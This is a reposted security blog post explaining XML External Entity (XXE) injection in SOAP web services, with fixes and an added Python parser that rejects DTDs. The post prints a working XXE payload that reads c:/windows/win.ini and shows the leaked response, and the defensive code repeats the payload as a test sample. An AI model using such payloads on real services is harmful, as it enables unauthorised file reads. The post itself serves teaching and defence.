Nytro, posted August 31, 2014

XML External Entity Injection For Fun and Maybe Profit
Ed_A | August 28, 2014

[Image: "Ooo injection... or maybe oww injection". Source: https://flic.kr/p/5LPRs7]

The eXtensible Markup Language, or XML, is commonly used in applications. XML allows data to be represented in a structured manner and is handled by an XML parser. XML parsers open up new avenues for web attacks, including XML Injection, Entity Expansion and the topic of this blog, XML External Entity Injection; but first, some background.

SOAP Web Services

The Simple Object Access Protocol, or SOAP, is a type of web service. SOAP is standards based. The transport is XML over HTTP in both directions. A standard SOAP request looks like this one, available at http://www.webservicex.net/ws/WSDetails.aspx?CATID=2&WSID=9:

POST /stockquote.asmx HTTP/1.1
Host: www.webservicex.net
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://www.webserviceX.NET/GetQuote"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetQuote xmlns="http://www.webserviceX.NET/">
      <symbol>string</symbol>
    </GetQuote>
  </soap:Body>
</soap:Envelope>

HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: length

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetQuoteResponse xmlns="http://www.webserviceX.NET/">
      <GetQuoteResult>string</GetQuoteResult>
    </GetQuoteResponse>
  </soap:Body>
</soap:Envelope>

A SOAP envelope containing XML is sent to the server via POST and processed by an XML parser, and the server responds with a SOAP envelope containing the response.

XXE

XML External Entity (XXE) injection vulnerabilities arise because the XML specification allows XML documents to define entities which reference resources external to the document. XML parsers typically support this feature by default, even though it is rarely required by applications during normal usage.

XXE Injection is an attack in which an attacker defines an arbitrary entity that is resolved by the XML parser if the parser lacks validation checks. Entities are used as abbreviations to represent a repetitive value. External entities can reference files on the parser's filesystem; exploiting this feature may allow retrieval of arbitrary files, or denial of service by causing the server to read from a file such as /dev/random. They can also reference URLs; exploiting this feature may allow port scanning from the XML parser's host, or the retrieval of sensitive web content which is otherwise inaccessible due to network topology and defenses.

An attack string would look like:

<!DOCTYPE foo [<!ENTITY test SYSTEM "file:///c:/windows/win.ini"> ]>

This string is referred to as a DTD, or Document Type Declaration. A DTD is simply a mechanism for defining entities. The DOCTYPE name "foo" is not important; it can be any arbitrary value. The keyword "SYSTEM" indicates that the entity's content should be read from the location that follows. This string is telling the XML parser to replace references to "&test;" with the contents of C:\Windows\win.ini. This could be any file readable by the account under which the application is running.

The defined entity "test" would then be inserted into the normal SOAP message in a value. The full attack payload would resemble:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [<!ENTITY test SYSTEM "file:///c:/windows/win.ini"> ]>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetQuoteResponse xmlns="http://www.webserviceX.NET/">
      <GetQuoteResult>&test;</GetQuoteResult>
    </GetQuoteResponse>
  </soap:Body>
</soap:Envelope>

If the service is vulnerable, it should return:

HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: length

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetQuoteResponse xmlns="http://www.webserviceX.NET/">
      <GetQuoteResult>; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
aif=MPEGVideo
aifc=MPEGVideo
aiff=MPEGVideo
asf=MPEGVideo
asx=MPEGVideo
au=MPEGVideo
m1v=MPEGVideo
m3u=MPEGVideo
mp2=MPEGVideo
mp2v=MPEGVideo
mp3=MPEGVideo
mpa=MPEGVideo
mpe=MPEGVideo
mpeg=MPEGVideo
mpg=MPEGVideo
mpv2=MPEGVideo
snd=MPEGVideo
wax=MPEGVideo
wm=MPEGVideo
wma=MPEGVideo
wmv=MPEGVideo
wmx=MPEGVideo
wpl=MPEGVideo
wvx=MPEGVideo</GetQuoteResult>
    </GetQuoteResponse>
  </soap:Body>
</soap:Envelope>

This attack is beginning to appear more often despite the fact that the vulnerability has existed for years. In January, Facebook paid one of the largest bounties to date for an XXE vulnerability discovered in OpenID (Threatpost: "Facebook Pays $33,500 Bounty for Major Code Execution Flaw"). If you read the article, you will see that XXE can be turned into remote code execution. Intriguing...

Fixes

Validate user supplied input before passing it to the XML parser for processing. Additionally, the parser may be able to disable DTD parsing and/or disable resolution of external entities via configuration options.

As always, feel free to reach out to us here at FoD with any questions via Twitter (@hpappsecurity) or via email (fodsales(at)hp.com). We'd love to hear your questions or comments about data breaches, identity theft management, and how they affect you.

Source: XML External Entity Injection For Fun and Maybe Profit - HP Enterprise Business Community
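Both fixes above in one place, as an added Python example that is not from the post or from HP: a stdlib SAX parser that refuses any DOCTYPE the moment it starts (before an entity can be declared, which is the input-validation step) and also switches off external entity resolution through the parser's own features (the configuration step). The GetQuote envelopes are constructed from the post's samples; the symbol value HPQ and the function names are made up.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, feature_external_pes, property_lexical_handler

class DoctypeRejected(ValueError):
    """Raised when a request carries a DOCTYPE and so may declare entities."""

class _RejectDoctype:
    """Minimal LexicalHandler: abort as soon as a DTD starts, before any entity is declared."""
    def startDTD(self, name, public_id, system_id):
        raise DoctypeRejected(f"DOCTYPE {name!r} is not allowed in a SOAP request")
    def _ignore(self, *args): pass
    endDTD = comment = startCDATA = endCDATA = _ignore  # expat reader expects these to exist

class _SymbolCollector(ContentHandler):
    """Collects the text of <symbol>, the only value GetQuote needs."""
    def __init__(self):
        super().__init__()
        self._inside, self.symbol = False, ""
    def startElement(self, name, attrs):
        if name == "symbol": self._inside = True
    def endElement(self, name):
        if name == "symbol": self._inside = False
    def characters(self, content):
        if self._inside: self.symbol += content

def parse_get_quote(body: bytes) -> str:
    """Parse a GetQuote envelope with DTDs rejected and external entities disabled."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)  # never fetch external general entities
    parser.setFeature(feature_external_pes, False)  # nor external parameter entities
    parser.setProperty(property_lexical_handler, _RejectDoctype())
    collector = _SymbolCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(body))
    return collector.symbol

def is_rejected(body: bytes) -> bool:
    try:
        parse_get_quote(body)
        return False
    except DoctypeRejected:
        return True

# Constructed samples modelled on the envelopes in the post; the symbol value is made up.
ENVELOPE = (b'<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>'
            b'<GetQuote xmlns="http://www.webserviceX.NET/"><symbol>%s</symbol></GetQuote></soap:Body></soap:Envelope>')
CLEAN_REQUEST = b'<?xml version="1.0" encoding="utf-8"?>' + ENVELOPE % b"HPQ"
XXE_REQUEST = (b'<?xml version="1.0" encoding="utf-8"?><!DOCTYPE foo '
               b'[<!ENTITY test SYSTEM "file:///c:/windows/win.ini"> ]>' + ENVELOPE % b"&test;")
```

The DOCTYPE check fires before the internal subset is parsed, so the `&test;` reference in the XXE request is never even seen by the entity machinery; the feature flags are the second line of defence should a DTD slip through elsewhere.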